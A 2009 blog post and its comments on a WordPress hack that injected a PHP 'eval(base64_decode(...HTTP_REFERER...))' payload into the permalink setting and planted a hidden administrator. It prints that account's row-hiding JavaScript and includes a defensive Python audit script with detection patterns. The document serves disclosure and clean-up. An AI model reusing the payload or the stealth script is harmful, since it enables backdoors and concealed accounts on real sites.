WordPress Code At The End Of URLs, Hack?

Posted by watashii | Filed under WordPress

permalink

http://blog.watashii.com/2009/09/05/wordpress-code-at-the-end-of-urls-hack/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Possibly a new WordPress hack happening at the moment?  I just got this weird code appended to the end of every URL on my WordPress blog.  The cause is that the Permalink Settings have been changed to a custom structure containing that code.  To revert it, simply go to [Dashboard > Settings > Permalink] and change the Custom Structure back to your original default option.

I’ve also noticed that a few more users (a new Administrator and a bunch of Subscribers) were added by this hack [Dashboard > Users]. You may also notice that the new administrator is hidden from the user list.  What I did was view the page source to pull its User ID.  Then edit that user to demote it to a Subscriber (http://your_blog_url/wp-admin/user-edit.php?user_id=XXX) and rename its first name, which contains the JavaScript that hides the row.  After that, delete the extra subscribers.

I also upgraded from WP 2.7 to the latest version, 2.8.4.
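The clean-up above is manual: look at the permalink structure, look at the user list, compare against what you expect. The following script is an added example (not the blog author's code and not part of WordPress) that does the same checks offline over values exported from the database: the permalink_structure row of wp_options, and the rows of wp_users together with the first_name/last_name meta. The sample data is constructed: the permalink suffix is the one visible in this post's own URL, URL-decoded, while the "/%year%/%monthnum%/%day%/%postname%/" prefix, the user logins, IDs, registration timestamps and the incident start time are assumptions for the example.

```python
import re
from urllib.parse import unquote

# --- Constructed sample data (not taken from the blog's database) -------------
# The suffix is the code visible in the post's own URL, URL-decoded. The
# "/%year%/%monthnum%/%day%/%postname%/" prefix is an assumption about what the
# structure looked like before it was tampered with.
SAMPLE_PERMALINK_STRUCTURE = "/%year%/%monthnum%/%day%/%postname%/" + unquote(
    "%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/"
)

# Rows as they might be exported from wp_users plus the first_name/last_name
# meta; logins, IDs and timestamps are made up for the example.
SAMPLE_USERS = [
    {"ID": 1, "user_login": "watashii", "role": "administrator",
     "display_name": "watashii", "first_name": "", "last_name": "",
     "user_registered": "2008-11-02 10:15:00"},
    {"ID": 12, "user_login": "reader_jane", "role": "subscriber",
     "display_name": "reader_jane", "first_name": "Jane", "last_name": "",
     "user_registered": "2009-06-01 08:02:33"},
    {"ID": 57, "user_login": "superuser", "role": "administrator",
     "display_name": "superuser", "last_name": "",
     # abbreviated form of the script the post shows in the hidden admin's name
     "first_name": '<div id="user_superuser"><script language="JavaScript">'
                   "var setUserName=function(){/* removes its own row */};"
                   "addLoadEvent(setUserName);</script></div>",
     "user_registered": "2009-09-03 22:41:07"},
    {"ID": 58, "user_login": "xkq9ubwe", "role": "subscriber",
     "display_name": "xkq9ubwe", "first_name": "", "last_name": "",
     "user_registered": "2009-09-03 22:41:09"},
]
KNOWN_ADMINS = {"watashii"}             # logins the site owner actually created
INCIDENT_START = "2009-09-03 00:00:00"  # when the odd URLs first appeared (assumed)

# --- Permalink structure check ------------------------------------------------
# A genuine structure is built only from %tag% tokens and plain path characters.
STRUCTURE_TAG = re.compile(r"%[a-z_]+%")
PATH_CHAR = re.compile(r"[A-Za-z0-9/_.\-]")
# Markers of PHP code smuggled into a setting that should only hold a path pattern.
PHP_CODE_MARKERS = re.compile(
    r"eval\s*\(|base64_decode|\$_(SERVER|GET|POST|REQUEST|COOKIE)|\$\{|assert\s*\(",
    re.IGNORECASE,
)


def audit_permalink_structure(structure: str) -> list:
    """Return a list of findings for a permalink structure; empty means clean."""
    findings = []
    for m in PHP_CODE_MARKERS.finditer(structure):
        findings.append(f"php code marker {m.group(0)!r} in permalink structure")
    leftover = STRUCTURE_TAG.sub("", structure)
    bad = "".join(sorted({c for c in leftover if not PATH_CHAR.match(c)}))
    if bad:
        findings.append(f"unexpected characters {bad!r} outside %tag% tokens")
    return findings


# --- User list check ----------------------------------------------------------
# Markup has no business in a name field; the hidden admin in the post carried a
# <div><script> in its first name that deleted its own row in the browser.
MARKUP_IN_NAME = re.compile(
    r"<\s*(script|div|img|iframe|svg)\b|javascript:|on\w+\s*=", re.IGNORECASE
)
NAME_FIELDS = ("user_login", "display_name", "first_name", "last_name", "user_nicename")


def audit_users(users, known_admins, since) -> list:
    """Return (user ID, finding) pairs for accounts that deserve a look."""
    findings = []
    for u in users:
        for field in NAME_FIELDS:
            if MARKUP_IN_NAME.search(u.get(field, "")):
                findings.append((u["ID"], f"markup in {field}"))
        if u.get("role") == "administrator" and u["user_login"] not in known_admins:
            findings.append((u["ID"], "administrator not in the known-admin list"))
        # user_registered is "YYYY-MM-DD HH:MM:SS", so string order is time order
        if u["user_registered"] >= since and u["user_login"] not in known_admins:
            findings.append((u["ID"], "registered on or after the incident start"))
    return findings


def run_audit(structure=SAMPLE_PERMALINK_STRUCTURE, users=SAMPLE_USERS,
              known_admins=KNOWN_ADMINS, since=INCIDENT_START) -> dict:
    return {"permalink": audit_permalink_structure(structure),
            "users": audit_users(users, known_admins, since)}


if __name__ == "__main__":
    for section, items in run_audit().items():
        print(section)
        for item in items:
            print("   ", item)
```

The two checks are deliberately independent of the admin pages, because the injected script rewrites the user list in the browser (it removes the row, lowers the "shown below" count and the Administrator count); reading the exported rows sidesteps that. The registration-window rule is the noisy one: legitimate subscribers who signed up after the incident started will be listed too, so treat it as a shortlist to review, not a delete list.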

Follow discussion here.

The script stored in the hidden administrator's first name field, as it appeared in the page source of the Users screen (reformatted here, with the quote characters and the regex escapes restored):

    …<div id="user_superuser"><script language="JavaScript">
    var setUserName = function(){
        try{
            // walk up from the injected <div> to the enclosing table row and remove it,
            // so the account no longer appears in the user list
            var t=document.getElementById("user_superuser");
            while(t.nodeName!="TR"){
                t=t.parentNode;
            };
            t.parentNode.removeChild(t);
            // lower the "N ... shown below" count in the page heading by one
            var tags = document.getElementsByTagName("H3");
            var s = " shown below";
            for (var i = 0; i < tags.length; i++) {
                var t=tags[i].innerHTML;
                var h=tags[i];
                if(t.indexOf(s)>0){
                    s =(parseInt(t)-1)+s;
                    h.removeChild(h.firstChild);
                    t = document.createTextNode(s);
                    h.appendChild(t);
                }
            }
            // lower the "Administrator (N)" count in the role filter links by one
            var arr=document.getElementsByTagName("ul");
            for(var i in arr) if(arr[i].className=="subsubsub"){
                var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
                if(n[1]>0){
                    var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
                    arr[i].innerHTML=txt;
                }
            }
        }catch(e){};
    };
    // run once the admin page has loaded
    addLoadEvent(setUserName);
    </script></div>


5 Responses to “WordPress Code At The End Of URLs, Hack?”

  1. Emily Green Says:
    September 4th, 2009 at 3:45 pm

    The same thing started happening on mine. Your advice corrected it. Thank you!

  2. Up and running | Chance of Rain Says:
    September 4th, 2009 at 3:58 pm

    [...] find the problem. For other WordPress users who experienced junk code corrupting their links, the Hero under the Sink who fixed it with simple, clear instructions can be found by clicking on the cartoon. Category: [...]

  3. Matt Coogan Says:
    September 7th, 2009 at 5:55 pm

    I too had the same hack. I deleted the hidden admin user from the MySQL admin page from my host. I then deleted all users that we suspected as spammer hackers (from a WordPress forum post).

    Do you think that is sufficient to get rid of the hack, or should I have followed your method? I am a first-time hacking victim.

    Thanks for the helpful info.

  4. watashii Says:
    September 8th, 2009 at 12:24 am

    WordPress support suggests upgrading to 2.8.4. The hack was known to occur only on older versions.

  5. kurye Says:
    September 14th, 2009 at 8:30 pm

    very nice great post :)
